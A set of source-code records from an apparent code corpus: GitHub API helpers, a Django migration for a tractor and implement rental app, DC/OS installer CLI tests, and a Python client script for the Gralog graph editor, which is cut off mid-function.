ghub.context.location = repo_name + "/pull_requests/" + pr_no
ghub.context.cache = response.json()
return True
elif response.status_code == 404:
print("No PR found with PR number {}".format(pr_no))
return False
def get_pr_info(ghub, info_type="comments"):
info_url = ghub.context.cache["_links"][info_type]["href"]
response = ghub.github.get(info_url)
return response.json(), response.status_code
def get_issues(ghub, repo_name=None):
if repo_name == None:
repo_name = "/".join(ghub.context.location.split("/")[:2])
issue_url = ghub.api_url + ghub.endpoints["repos"] + repo_name + "/issues"
response = ghub.github.get(issue_url)
if response.status_code == 200:
ghub.context = Context(prev_context=ghub.context)
ghub.context.context = "issues"
ghub.context.location = repo_name + "/issues"
ghub.context.cache = response.json()
return True
return False
def get_issue(ghub, issue_no):
if not issue_no.isdigit():
print("Invalid issue number")
return False
repo_name = "/".join(ghub.context.location.split("/")[:2])
issue_url = (
ghub.api_url + ghub.endpoints["repos"] + repo_name + "/issues/" + issue_no
)
response = ghub.github.get(issue_url)
if response.status_code == 200:
ghub.context = Context(prev_context=ghub.context)
ghub.context.context = "issue"
ghub.context.location = repo_name + "/issues/" + issue_no
ghub.context.cache = response.json()
return True
elif response.status_code == 404:
print("No issue found with issue number {}".format(issue_no))
return False
def get_issue_info(ghub, info_type="comments"):
info_url = ghub.context.cache["{}_url".format(info_type)]
response = ghub.github.get(info_url)
return response.json(), response.status_code
| en | 0.695324 | Utilities for interacting with GitHub Authorize a user for GHub Keyword arguments: ghub -- the ghub object that needs authorization reauthorize -- performs authorization again (default False) | 2.633576 | 3 |
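The event_dict defined at the top of githubutils.py maps GitHub issue-event type names to small rendering functions, but the call site is not part of this excerpt. The sketch below shows one plausible way such a table is consumed when printing an issue's timeline; the sample payload is illustrative only and is shaped like the objects the lambdas above expect (an "event" name plus "actor"/"assignee" objects).

```python
# Hypothetical usage of the module's event_dict; the events below are made up
# but follow the field layout the lambdas above expect.
sample_events = [
    {"event": "assigned",
     "actor": {"login": "alice"},
     "assignee": {"login": "bob"}},
    {"event": "closed", "actor": {"login": "alice"}},
    {"event": "some_future_event", "actor": {"login": "carol"}},
]

def describe_events(events):
    """Turn raw issue events into human-readable lines using event_dict."""
    lines = []
    for event in events:
        renderer = event_dict.get(event["event"])
        if renderer is None:
            # Unknown event types are reported rather than crashing the loop.
            lines.append("(unhandled event type: {})".format(event["event"]))
        else:
            lines.append(renderer(event))
    return lines

for line in describe_events(sample_events):
    print(line)
```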
equipments/migrations/0001_initial.py | fagrimacs/fagrimacs_production | 0 | 8003 | # Generated by Django 3.0.7 on 2020-09-18 05:52
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
import multiselectfield.db.fields
class Migration(migrations.Migration):
initial = True
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
]
operations = [
migrations.CreateModel(
name='Equipment',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('type', models.CharField(choices=[(None, 'Please select'), ('tractor', 'Tractor'), ('implement', 'Implement'), ('other_equipment', 'Other Equipment')], max_length=100, verbose_name='What Equipment you want to Add?')),
],
),
migrations.CreateModel(
name='ImplementCategory',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=100)),
('image', models.ImageField(upload_to='implements_category')),
],
options={
'verbose_name_plural': 'Implement Categories',
},
),
migrations.CreateModel(
name='Phone',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('phone', models.CharField(max_length=18)),
],
),
migrations.CreateModel(
name='TractorCategory',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=100)),
('image', models.ImageField(upload_to='tractor_category')),
],
options={
'verbose_name_plural': 'Tractor Categories',
},
),
migrations.CreateModel(
name='Tractor',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('created', models.DateTimeField(auto_now_add=True)),
('modified', models.DateTimeField(auto_now=True)),
('drive_type', models.CharField(choices=[(None, 'Please Select'), ('two wheel drive', 'Two wheel Drive'), ('four wheel drive', 'Four wheel Drive')], max_length=100, verbose_name='What Drive Type')),
('name', models.CharField(help_text='eg. <NAME> 6190R', max_length=200, verbose_name='Name/Models of Tractor')),
('mode_of_transmission', models.CharField(choices=[(None, 'Please Select'), ('gear', 'Gear'), ('manual', 'Manual'), ('hydrostatic', 'Hydrostatic'), ('turbochanged', 'Turbocharged')], max_length=100, verbose_name='Mode of Transmission')),
('engine_hp', models.PositiveIntegerField(verbose_name='Engine Horse Power (eg. 75hp)')),
('drawbar_hp', models.PositiveIntegerField(verbose_name='Drawbar Horse Power (eg. 65hp)')),
('pto_hp', models.PositiveIntegerField(verbose_name='PTO Horse Power (eg. 85hp)')),
('hydraulic_capacity', models.CharField(help_text='Use units of gpm or psi', max_length=100, verbose_name='Hydraulic capacity (gallons per minute (gpm) or psi (pounds per square inch))')),
('type_of_hitching', models.CharField(choices=[(None, 'Please Select'), ('two point hitches', 'Two-point hitches'), ('three point hitches', 'Three-point hitches')], max_length=100, verbose_name='What is Hitching type?')),
('cab', models.BooleanField(default=False, verbose_name='Does have a cab?')),
('rollover_protection', models.BooleanField(default=False, verbose_name='Does have the rollover protection?')),
('fuel_consumption', models.PositiveIntegerField(verbose_name='Fuel consumption (gallon per hour on operation)')),
('attachment_mode', models.CharField(choices=[(None, 'Please select'), ('frontend loader', 'frontend loader'), ('backhoe', 'Backhoe'), ('both', 'Both')], max_length=100, verbose_name='What mode of attachment?')),
('operator', models.BooleanField(default=False, verbose_name='Do you have an operator(s)?')),
('file', models.FileField(help_text='Upload quality picture of real tractor you have, only 5 picture.', upload_to='tractors_photos/', verbose_name='Upload the Tractor pictures')),
('other_informations', models.TextField(blank=True, verbose_name='Describe your Tractor')),
('price_hour', models.PositiveIntegerField(verbose_name='Specify the price per Hour in TShs.')),
('price_hectare', models.PositiveIntegerField(verbose_name='Specify the price per Hectare')),
('farm_services', multiselectfield.db.fields.MultiSelectField(choices=[('soil cultivations', 'Soil cultivations'), ('planting', 'Planting'), ('haversting/post-haversting', 'Haversting/Post-Haversting'), ('fertilizing & pest-control', 'Fertilizing & Pest-control'), ('drainage & irrigation', 'Drainage & Irrigation'), ('loading', 'Loading'), ('hay making', 'Hay making'), ('miscellaneous', 'Miscellaneous')], max_length=135, verbose_name='What are farming service(s) do you offer?')),
('agree_terms', models.BooleanField(default=False, verbose_name='Do you accept our Terms and Conditions?')),
('status', models.CharField(choices=[('pending', 'Pending'), ('approved', 'Approved')], default='pending', max_length=100)),
('tractor_type', models.ForeignKey(on_delete=models.SET('others'), to='equipments.TractorCategory', verbose_name='What type of Tractor?')),
('user', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
],
),
migrations.CreateModel(
name='ImplementSubCategory',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=100)),
('category', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='equipments.ImplementCategory')),
],
options={
'verbose_name_plural': 'Implement Subcategories',
},
),
migrations.CreateModel(
name='Implement',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('created', models.DateTimeField(auto_now_add=True)),
('modified', models.DateTimeField(auto_now=True)),
('name', models.CharField(max_length=100, verbose_name='Name/Models of Implement')),
('width', models.PositiveIntegerField(help_text='SI UNITS in metre', verbose_name='Width of the Implement')),
('weight', models.PositiveIntegerField(help_text='SI UNITS in KG', verbose_name='Weight of the Implement')),
('operation_mode', models.CharField(choices=[(None, 'Please Select'), ('tractor drive', 'Tractor drive'), ('self-propelled', 'Self-propelled')], max_length=100, verbose_name='What is mode of operation?')),
('pto', models.PositiveIntegerField(verbose_name='What is Horse Power required for Operation?')),
('hydraulic_capacity', models.CharField(max_length=100, verbose_name='What is the Hydraulic capacity required to lift?')),
('operator', models.BooleanField(verbose_name='Do you have an operator(s)?')),
('file', models.FileField(help_text='Upload quality picture of real implement you have, only 5 pictures.', upload_to='implements_photos/', verbose_name='Upload the Implement pictures')),
('other_informations', models.TextField(blank=True, verbose_name='Describe your Implement')),
('price_hour', models.PositiveIntegerField(verbose_name='Specify the price per Hour')),
('price_hectare', models.PositiveIntegerField(verbose_name='Specify the price per Hectare')),
('agree_terms', models.BooleanField(default=False, verbose_name='Do you accept our Terms and Conditions?')),
('status', models.CharField(choices=[('pending', 'Pending'), ('approved', 'Approved')], default='pending', max_length=100)),
('category', models.ForeignKey(on_delete=models.SET('others'), to='equipments.ImplementCategory', verbose_name='What category of your Implement')),
('subcategory', models.ForeignKey(on_delete=models.SET('others'), to='equipments.ImplementSubCategory', verbose_name='What is subcategory of your Implement')),
('user', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
],
),
]
| en | 0.795899 | # Generated by Django 3.0.7 on 2020-09-18 05:52 | 1.751481 | 2 |
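Two details of the migration above are easy to miss: the status fields are constrained to the 'pending'/'approved' choices, and farm_services is a django-multiselectfield MultiSelectField, which stores the chosen options as a comma-separated string while exposing them as a list in Python. A hedged usage sketch follows; it assumes the Tractor model generated from this migration lives in an equipments app inside a configured Django project.

```python
# Sketch only: assumes a configured Django project with the "equipments" app
# whose Tractor model matches the migration above.
from equipments.models import Tractor

def approved_tractors_offering(service):
    """Approved tractors whose multiselect farm_services includes `service`."""
    # MultiSelectField is backed by a comma-separated CharField, so a
    # substring lookup is the usual way to filter on one selected option.
    return Tractor.objects.filter(status="approved", farm_services__contains=service)

for tractor in approved_tractors_offering("planting"):
    print(tractor.name, list(tractor.farm_services))
```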
dcos_installer/test_cli.py | nkhanal0/dcos | 3 | 8004 | import pytest
import gen
from dcos_installer import cli
def test_default_arg_parser():
parser = cli.get_argument_parser().parse_args([])
assert parser.verbose is False
assert parser.port == 9000
assert parser.action == 'genconf'
def test_set_arg_parser():
argument_parser = cli.get_argument_parser()
def parse_args(arg_list):
return argument_parser.parse_args(arg_list)
parser = parse_args(['-v', '-p 12345'])
assert parser.verbose is True
assert parser.port == 12345
parser = parse_args(['--web'])
assert parser.action == 'web'
parser = parse_args(['--genconf'])
assert parser.action == 'genconf'
parser = parse_args(['--preflight'])
assert parser.action == 'preflight'
parser = parse_args(['--postflight'])
assert parser.action == 'postflight'
parser = parse_args(['--deploy'])
assert parser.action == 'deploy'
parser = parse_args(['--validate-config'])
assert parser.action == 'validate-config'
parser = parse_args(['--hash-password', 'foo'])
assert parser.password == '<PASSWORD>'
assert parser.action == 'hash-password'
parser = parse_args(['--hash-password'])
assert parser.password is None
assert parser.action == 'hash-password'
parser = parse_args(['--set-superuser-password', 'foo'])
assert parser.password == '<PASSWORD>'
assert parser.action == 'set-superuser-password'
parser = parse_args(['--set-superuser-password'])
assert parser.password is None
assert parser.action == 'set-superuser-password'
parser = parse_args(['--generate-node-upgrade-script', 'fake'])
assert parser.installed_cluster_version == 'fake'
assert parser.action == 'generate-node-upgrade-script'
# Can't do two at once
with pytest.raises(SystemExit):
parse_args(['--validate', '--hash-password', 'foo'])
def test_stringify_config():
stringify = gen.stringify_configuration
# Basic cases pass right through
assert dict() == stringify(dict())
assert {"foo": "bar"} == stringify({"foo": "bar"})
assert {"a": "b", "c": "d"} == stringify({"a": "b", "c": "d"})
# booleans are converted to lower case true / false
assert {"a": "true"} == stringify({"a": True})
assert {"a": "false"} == stringify({"a": False})
assert {"a": "b", "c": "false"} == stringify({"a": "b", "c": False})
# integers are made into strings
assert {"a": "1"} == stringify({"a": 1})
assert {"a": "4123"} == stringify({"a": 4123})
assert {"a": "b", "c": "9999"} == stringify({"a": "b", "c": 9999})
# Dict and list are converted to JSON
assert {"a": '["b"]'} == stringify({"a": ['b']})
assert {"a": '["b\\"a"]'} == stringify({"a": ['b"a']})
assert {"a": '[1]'} == stringify({"a": [1]})
assert {"a": '[1, 2, 3, 4]'} == stringify({"a": [1, 2, 3, 4]})
assert {"a": '[true, false]'} == stringify({"a": [True, False]})
assert {"a": '{"b": "c"}'} == stringify({"a": {"b": "c"}})
assert {"a": '{"b": 1}'} == stringify({"a": {"b": 1}})
assert {"a": '{"b": true}'} == stringify({"a": {"b": True}})
assert {"a": '{"b": null}'} == stringify({"a": {"b": None}})
# Random types produce an error.
with pytest.raises(Exception):
stringify({"a": set()})
# All the handled types at once
assert {
"a": "b",
"c": "true",
"d": "1",
"e": "[1]",
"f": '{"g": "h"}'
} == stringify({"a": "b", "c": True, "d": 1, "e": [1], "f": {"g": "h"}})
| en | 0.880411 | # Can't do two at once # Basic cases pass right through # booleans are converted to lower case true / false # integers are made into strings # Dict and list are converted to JSON # Random types produce an error. # All the handled types at once | 2.440561 | 2 |
gralog-fx/src/main/java/gralog/gralogfx/piping/scripts/Gralog.py | gralog/gralog | 12 | 8005 | #!/usr/bin/env python3
import sys
from random import randint
import os
try:
    import networkx as nx
except ImportError:
    print("gPrint#-1#" + "networkx not installed for " + sys.executable)
    sys.stdout.flush()
try:
    import igraph as ig
except ImportError:
    print("gPrint#-1#" + "igraph not installed for " + sys.executable)
    sys.stdout.flush()
import xml.etree.ElementTree as ET  # cElementTree is deprecated and removed in newer Python 3
import math
# debugging = False
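# Protocol note (inferred from the calls below): every request to Gralog is written
# to stdout as a single '#'-separated line, e.g.
#   "addVertex#<graphId>#<x>#<y>"
# and the reply is read back from stdin, which is why each command is followed by
# sys.stdout.flush().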
class Vertex:
def __init__(self, graph, vid):
self.sourced = False
self.id = int(vid)
self.graph = graph
self.properties = dict()
self.properties["id"] = None
self.properties["label"] = None
self.properties["color"] = None
self.properties["strokeColor"] = None
self.properties["shape"] = None
self.properties["coordinates"] = None
self.incomingEdges = []
self.outgoingEdges = []
self.incidentEdges = []
self.wasSourced = False
def sourceProperties(self, stringFromGralog):
        self.sourced = True
        self.wasSourced = True
strings = stringFromGralog.split("#")
for string in strings:
propVal = string.split("=")
valueType = ""
try:
prop = propVal[0]
valueType = propVal[1]
except:
pass
try:
valueType = valueType.split("|")
val = valueType[0]
typ = valueType[1]
castedValue = self.graph.castValueToType(val, typ)
self.properties[prop] = castedValue
except:
pass
def getId(self):
return self.id
def getLabel(self):
if not self.wasSourced:
self.source()
return self.properties["label"]
def setLabel(self, label):
label = str(label)
self.properties["label"] = label
self.graph.setVertexLabel(self.id, label)
def setCoordinates(self, coordinates):
co = self.properties["coordinates"]
x = coordinates[0]
y = coordinates[1]
if co == None:
co = (None, None)
if x == None:
x = co[0]
if y == None:
y = co[1]
newCoordinates = (x, y)
self.properties["coordinates"] = newCoordinates
self.graph.setVertexCoordinates(self.id, newCoordinates)
def setFillColor(self, colorHex=-1, colorRGB=-1):
self.setColor(colorHex, colorRGB)
def getFillColor(self):
return self.getColor()
def getColor(self):
if not self.wasSourced:
self.source()
return self.properties["color"]
def setColor(self, colorHex=-1, colorRGB=-1):
if colorHex != -1:
self.properties["fillColor"] = colorHex
elif colorRGB != -1:
self.properties["fillColor"] = colorRGB
else:
return
self.graph.setVertexFillColor(self.id, colorHex, colorRGB)
def setStrokeColor(self, colorHex=-1, colorRGB=-1):
if colorHex != -1:
self.properties["strokeColor"] = colorHex
elif colorRGB != -1:
self.properties["strokeColor"] = colorRGB
else:
return
self.graph.setVertexStrokeColor(self.id, colorHex, colorRGB)
def getStrokeColor(self):
if not self.sourced:
self.source()
return self.properties["strokeColor"]
def setRadius(self, radius):
self.properties["radius"] = radius
self.properties["width"] = radius
self.properties["height"] = radius
self.graph.setVertexRadius(self.id, radius)
def setWidth(self, width):
self.properties["width"] = width
self.graph.setVertexWidth(self.getId(), width)
def setHeight(self, height):
self.properties["height"] = height
self.graph.setVertexHeight(self.getId(), height)
def setShape(self, shape):
self.properties["shape"] = shape
self.graph.setVertexShape(self.id, shape)
def setProperty(self, otherProperty, value):
self.properties[otherProperty] = value
self.graph.setVertexProperty(self.id, otherProperty, value)
def getProperty(self, otherProperty):
if not self.sourced:
self.source()
return self.properties[otherProperty]
def get(self, prop):
if not self.sourced:
self.source()
return self.properties[prop]
def getNeighbours(self):
return self.graph.getNeighbours(self.id)
def getOutgoingNeighbours(self):
return self.graph.getOutgoingNeighbours(self.id)
def getIncomingNeighbours(self):
return self.graph.getIncomingNeighbours(self.id)
def getOutgoingEdges(self):
return self.graph.getOutgoingEdges(self.id)
def getIncomingEdges(self):
return self.graph.getIncomingEdges(self.id)
def getIncidentEdges(self):
return self.graph.getIncidentEdges(self.id)
def delete(self):
return self.graph.deleteVertex(self)
def connect(self, v1, edgeId=-1):
return self.graph.addEdge(self, v1, edgeId)
def getAllEdgesBetween(self, vertex2):
return self.graph.getAllEdgesBetween((self.id, vertex2))
def source(self):
return self.graph.getVertex(self)
def __str__(self):
return str(self.getId())
# Open question: when fetching a vertex, should its neighbours and incident edges be
# fetched as well? That is all quite costly and leads to the paradigm of simply
# mirroring the whole graph in Python.
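# Minimal usage sketch (assumes this script is launched by a running Gralog instance,
# so stdin/stdout are wired to the piping protocol described above):
#   g = Graph("Undirected Graph")
#   v = g.addVertex()
#   w = g.addVertex()
#   e = v.connect(w)
#   v.setLabel("start")
#   v.setFillColor(colorRGB=(255, 0, 0))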
class Edge:
# private methods
def __init__(self, graph, eid):
self.sourced = False
        self.id = int(eid)  # if -2, the edge was imported without an id (e.g. plain TGF)
self.graph = graph
self.properties = dict()
self.properties["id"] = None
self.properties["label"] = None
self.properties["color"] = None
self.properties["weight"] = None
self.properties["contour"] = None
self.properties["source"] = None
self.properties["target"] = None
self.wasSourced = False
def sourceProperties(self, stringFromGralog):
self.sourced = True
strings = stringFromGralog.split("#")
for string in strings:
propVal = string.split("=")
try:
prop = propVal[0]
valueType = propVal[1]
valueType = valueType.split("|")
val = valueType[0]
typ = valueType[1]
self.properties[prop] = self.graph.castValueToType(val, typ)
except:
pass
def setTarget(self, target): # don't use!!
self.properties["target"] = target
def setSource(self, source):
self.properties["source"] = source
# public methods
def getId(self):
return self.id
def setLabel(self, label):
label = str(label)
self.properties["label"] = label
self.graph.setEdgeLabel(self.id, label)
def getLabel(self):
if not self.sourced:
self.source()
return self.properties["label"]
def setColor(self, colorHex=-1, colorRGB=-1):
if colorHex != -1:
self.properties["color"] = colorHex
elif colorRGB != -1:
self.properties["color"] = colorRGB
else:
return
self.graph.setEdgeColor(self.id, colorHex, colorRGB)
def getColor(self):
if not self.sourced:
self.source()
return self.properties["color"]
def setWeight(self, weight):
self.properties["weight"] = float(weight)
self.graph.setEdgeWeight(self.id, weight)
def getWeight(self):
if not self.sourced:
self.source()
return self.properties["weight"]
def setThickness(self, thickness):
self.properties["thickness"] = float(thickness)
self.graph.setEdgeThickness(self.id, thickness)
def getThickness(self):
if not self.sourced:
self.source()
return self.properties["thickness"]
def setContour(self, contour):
self.properties["contour"] = contour
self.graph.setEdgeContour(self.id, contour)
def getContour(self):
if not self.sourced:
self.source()
return self.properties["contour"]
def getSource(self):
if not self.sourced:
self.source()
return self.properties["source"]
def getTarget(self):
if not self.sourced:
self.source()
return self.properties["target"]
def setProperty(self, otherProperty, value):
self.properties[otherProperty] = value
self.graph.setEdgeProperty(self, otherProperty, value)
def getProperty(self, otherProperty):
if not self.sourced:
self.source()
return self.properties[otherProperty]
def get(self, prop):
self.source()
return self.properties[prop]
def delete(self):
return self.graph.deleteEdge(self.id)
def source(self):
return self.graph.getEdge(self)
def getAdjacentEdges(self):
return self.graph.getAdjacentEdges(self.id)
def __str__(self):
source = self.getSource().getId()
target = self.getTarget().getId()
return "({:},{:})".format(source, target)
def rgbFormatter(colorRGB):
r = colorRGB[0]
g = colorRGB[1]
b = colorRGB[2]
s = "rgb"
s += "(" + str(r).rstrip() + "," + \
str(g).rstrip() + "," + str(b).rstrip() + ")"
return s.rstrip()
def hexFormatter(colorHex):
s = "hex"
if colorHex[0] == "#":
colorHex = colorHex[1:]
s += "("+str(colorHex).rstrip() + ")"
return s.rstrip()
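# e.g. rgbFormatter((255, 0, 0)) -> "rgb(255,0,0)" and
#      hexFormatter("#ff0000") -> "hex(ff0000)"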
def vertexId(vertex):
if isinstance(vertex, Vertex):
return vertex.getId()
return vertex
def edgeId(edge):
if isinstance(edge, Edge):
return edge.getId()
return edge
def extractIdFromProperties(stringFromGralog):
strings = stringFromGralog.split(",")
for string in strings:
propVal = string.split("=")
if propVal[0] == "id":
return propVal[1]
return None
def edgeSplitter(edge):
if type(edge) == tuple and len(edge) == 2: # edge as defined by start, end nodes
return str(vertexId(edge[0])).rstrip()+","+str(vertexId(edge[1])).rstrip()
if type(edge) == int: # edge is given by id
return str(edge).rstrip()
    return str(edge.getId()).rstrip()  # edge has type Edge
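# e.g. edgeSplitter((v, w)) -> "<id of v>,<id of w>", edgeSplitter(5) -> "5",
# and edgeSplitter(e) -> str(e.getId()) for an Edge object e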
class Graph:
def __init__(self, format="Undirected Graph"):
# perform analysis of graph
self.id_to_vertex = dict()
self.id_to_edge = dict()
self.lastIndex = -1
self.id = -1
self.variablesToTrack = dict()
if format == None or format.lower() == "none":
            # no explicit format: attach to the graph currently open in Gralog
print("useCurrentGraph")
sys.stdout.flush()
self.lastIndex = -1
self.id = sys.stdin.readline()
self.getGraph("gtgf")
else:
print(format)
sys.stdout.flush()
self.id = sys.stdin.readline()
# helper functions
def castValueToType(self, val, typ):
if typ == "float":
return float(val)
if typ == "int":
return int(val)
if typ == "bool":
return bool(val)
if typ == "string":
return str(val)
if typ == "vertex":
return self.getVertexOrNew(val)
return val
def getVertexOrNew(self, currId):
v = currId
if (isinstance(currId, str)):
currId = int(currId)
if (isinstance(currId, int)):
if currId in self.id_to_vertex:
v=self.id_to_vertex[currId]
else:
v=Vertex(self, currId)
self.id_to_vertex[currId] = v
return v
def getEdgeOrNew(self, currId):
if type(currId) == tuple:
e = self.getEdgeIdByEndpoints(currId)
return e
e = currId
if not (isinstance(currId, Edge)):
try:
e = self.id_to_edge[int(currId)]
except:
e = Edge(self, currId)
else:
gPrint("Error (getEdgeOrNew()): the argument \
is neither an edge id nor a pair of vertices.")
return e
def termToEdge(self, term):
endpoints = term.split(",")
eid = int(endpoints[0])
e = self.id_to_edge[eid]
e.sourceProperties(endpoints[0])
sourceId = int(endpoints[1])
source = self.getVertexOrNew(sourceId)
targetId = int(endpoints[2])
target = self.getVertexOrNew(targetId)
e.setSource(source)
e.setTarget(target)
return e
    @staticmethod
    def representsInt(s):
try:
int(s)
return True
except ValueError:
return False
def edgifyTGFCommand(self, line):
line = line.strip()
endpoints = line.split(" ")
v1String = endpoints[0]
v1 = self.getVertexOrNew(int(v1String))
v2String = endpoints[1]
v2 = self.getVertexOrNew(int(v2String))
e = self.getEdgeOrNew(-2)
e.setSource(v1)
e.setTarget(v2)
def vertexifyTGFCommand(self, line):
line = line.strip()
        vString = line.split(" ")[0]  # first token is the vertex id (not just its first character)
        v = self.getVertexOrNew(int(vString))
        self.id_to_vertex[v.getId()] = v
def edgifyGTGFCommand(self, line):
line = line.strip()
endpoints = line.split(" ")
v1String = endpoints[0]
v1 = self.getVertexOrNew(int(v1String))
v2String = endpoints[1]
v2 = self.getVertexOrNew(int(v2String))
eid = int(endpoints[2])
e = self.getEdgeOrNew(eid)
e.setSource(v1)
e.setTarget(v2)
self.id_to_edge[eid] = e
def vertexifyGTGFCommand(self, line):
self.vertexifyTGFCommand(line)
def getEdgeIdByEndpoints(self, endpoints):
line = "getEdgeIdByEndpoints#"+str(self.id).rstrip() + "#"
line = line + edgeSplitter(endpoints)
print(line.rstrip())
sys.stdout.flush()
edgeId = sys.stdin.readline().rstrip()
return edgeId
def getVertex(self, vertex):
line = "getVertex#"+str(self.id).rstrip() + "#"
line = line + str(vertex).rstrip()
print (line.rstrip())
sys.stdout.flush()
vertexTuple = sys.stdin.readline().rstrip()
vertex.sourceProperties(vertexTuple)
return vertex
def getEdge(self, edge):
line = "getEdge#"+str(self.id).rstrip() + "#"
line = line + edgeSplitter(edge)
print (line.rstrip())
sys.stdout.flush()
edgeTuple = sys.stdin.readline().rstrip()
edge.sourceProperties(edgeTuple)
return edge
# end helper functions
# Graph Manipulating Functions
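    # Note on addVertex below: it accepts an optional explicit id and/or an (x, y)
    # position, e.g. addVertex(), addVertex(7), addVertex((1.0, 2.0)) or
    # addVertex(7, (1.0, 2.0)); a lone tuple argument is interpreted as the position.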
def addVertex(self, vertexId=-1, pos=(None, None)):
# return: Vertex object with id
line = "addVertex#" + str(self.id).rstrip()
x = -1
y = -1
vertexIdSwap = False
if type(vertexId) == tuple and pos == (None, None):
x = vertexId[0]
y = vertexId[1]
vertexId = -1
else:
x = pos[0]
y = pos[1]
if vertexId != -1:
line += "#"+str(vertexId).rstrip()
if x != None and y != None:
line += "#" + str(x).rstrip() + "#" + str(y).rstrip()
print(line)
sys.stdout.flush()
vid = sys.stdin.readline()
v = Vertex(self, vid)
self.id_to_vertex[v.getId()] = v
return v
def deleteVertex(self, v):
edges = self.getIncidentEdges(v)
for e in edges:
del self.id_to_edge[e.getId()]
v = vertexId(v)
del self.id_to_vertex[v]
print("deleteVertex#" + str(self.id).rstrip() + "#" + str(v))
sys.stdout.flush()
def addEdge(self, sourceVertex, targetVertex, edgeId = -1):
# return: Edge object with id only
sourceVertex = vertexId(sourceVertex)
targetVertex = vertexId(targetVertex)
idSubString = ""
if not edgeId == -1:
idSubString = "#"+str(edgeId)
line = "addEdge#"+str(self.id).rstrip() + "#" + str(sourceVertex).rstrip() + \
"#" + str(targetVertex).rstrip() + idSubString.rstrip()
print(line.rstrip())
sys.stdout.flush()
eid = sys.stdin.readline()
if eid != "\n": # it's possible that the edge cannot be added (e.g., a new selfloop)
e = Edge(self, eid)
self.id_to_edge[e.getId()] = e
return e
return None
def existsEdge(self, edge):
line = "existsEdge#"+str(self.id).rstrip() + "#"
line = line + edgeSplitter(edge)
print(line.rstrip())
sys.stdout.flush()
thereExistsAnEdge = sys.stdin.readline().rstrip()
return thereExistsAnEdge.lower() == "true"
def existsVertex(self, vertex):
line = "existsVertex#"+str(self.id).rstrip() + "#"
line = line + str(vertex).rstrip()
print(line.rstrip())
sys.stdout.flush()
thereExistsAVertex = sys.stdin.readline().rstrip()
return thereExistsAVertex.lower() == "true"
def deleteEdge(self, edge):
del self.id_to_edge[edge.getId()]
line = "deleteEdge#"+str(self.id).rstrip() + "#"
line = line + edgeSplitter(edge)
print(line.rstrip())
sys.stdout.flush()
def getAllEdgesBetween(self, vertexPair):
line = "getAllEdgesBetween#"+str(self.id).rstrip() + "#"
line = line + edgeSplitter(vertexPair)
print(line.rstrip())
sys.stdout.flush()
endpointList = sys.stdin.readline()
endpointList = endpointList.split("#")
edges = []
for i in range(len(endpointList)):
term = endpointList[i].rstrip()
term = term[1:-1]
e = self.termToEdge(term)
if e != None:
edges.append(e)
return edges
    # creates a random Erdős–Rényi graph with vertexCount vertices and edge probability p
def generateRandomGraph(self, vertexCount, p):
        if not isinstance(vertexCount, int):
            gPrint("Cannot generate a random graph, wrong parameter: "
                   "vertex number must be an int.")
            return
        if vertexCount < 0:
            gPrint("Cannot generate a random graph, wrong parameter: "
                   "vertex number cannot be less than 0.")
            return
        if not isinstance(p, float) or p < 0 or p > 1.0:
            gPrint("Cannot generate a random graph, wrong parameter: "
                   "probability of an edge must be a float in [0,1].")
            return
        if vertexCount == 0:
            return
vertices = []
coordinates = dict()
for id in range(vertexCount):
coordinates[id] = (10*math.cos(2*id*math.pi/vertexCount),
10*math.sin(2*id*math.pi/vertexCount))
nxgraph = nx.fast_gnp_random_graph(vertexCount, p)
d = dict()
id = 0
for nxV in nxgraph.nodes():
d[id] = nxV
id += 1
nxEdges = nxgraph.edges()
id = 0
for x in range(vertexCount):
vertices.append(self.addVertex(id, coordinates[id]))
id += 1
for x in vertices:
for y in vertices:
if x.getId() < y.getId():
if (d[x.getId()], d[y.getId()]) in nxEdges:
x.connect(y)
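    # e.g. g.generateRandomGraph(10, 0.3) places 10 vertices on a circle of radius 10
    # and, via networkx's fast_gnp_random_graph, adds each possible edge with
    # probability 0.3 (requires networkx to be installed).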
    # end graph manipulating functions
# setter functions
# begin: best for private use!
def setVertexFillColor(self, vertex, colorHex=-1, colorRGB=-1):
vertex = vertexId(vertex)
line = "setVertexFillColor#" + str(self.id).rstrip() + "#" + str(vertex).rstrip() + "#"
if not (colorHex == -1):
line = line + hexFormatter(str(colorHex))
elif not (colorRGB == -1):
try:
line = line + rgbFormatter(colorRGB)
except:
self.sendErrorToGralog("the rgb color: " + str(colorRGB).rstrip() + " is not properly formatted!")
else:
self.sendErrorToGralog("neither Hex nor RGB color specified!")
print(line.rstrip())
sys.stdout.flush()
def setVertexStrokeColor(self, vertex, colorHex=-1, colorRGB=-1):
vertex = vertexId(vertex)
# print("colorhex: " + str(colorHex))
line = "setVertexStrokeColor#"+str(self.id).rstrip() + "#" + str(vertex).rstrip() + "#"
if not (colorHex == -1):
line = line + hexFormatter(str(colorHex))
elif not (colorRGB == -1) and len(colorRGB) == 3:
line = line + rgbFormatter(colorRGB)
print(line.rstrip())
sys.stdout.flush()
def setVertexCoordinates(self, vertex, coordinates):
line = "setVertexCoordinates#" + str(self.id).rstrip()+"#" + str(vertexId(vertex)).rstrip()
x = -1
y = -1
x = coordinates[0]
y = coordinates[1]
if x == None:
x = "empty"
if y == None:
y = "empty"
line += "#" + str(x).rstrip() + "#" + str(y).rstrip()
print(line)
sys.stdout.flush()
def setEdgeContour(self, edge, contour):
        line = "setEdgeContour#" + str(self.id).rstrip() + "#"
line = line + edgeSplitter(edge)
line = line + "#" + str(contour).rstrip()
print(line)
sys.stdout.flush()
def setEdgeColor(self, edge, colorHex=-1, colorRGB=-1):
line = "setEdgeColor#"+str(self.id).rstrip() + "#"
line = line + edgeSplitter(edge)
line = line + "#"
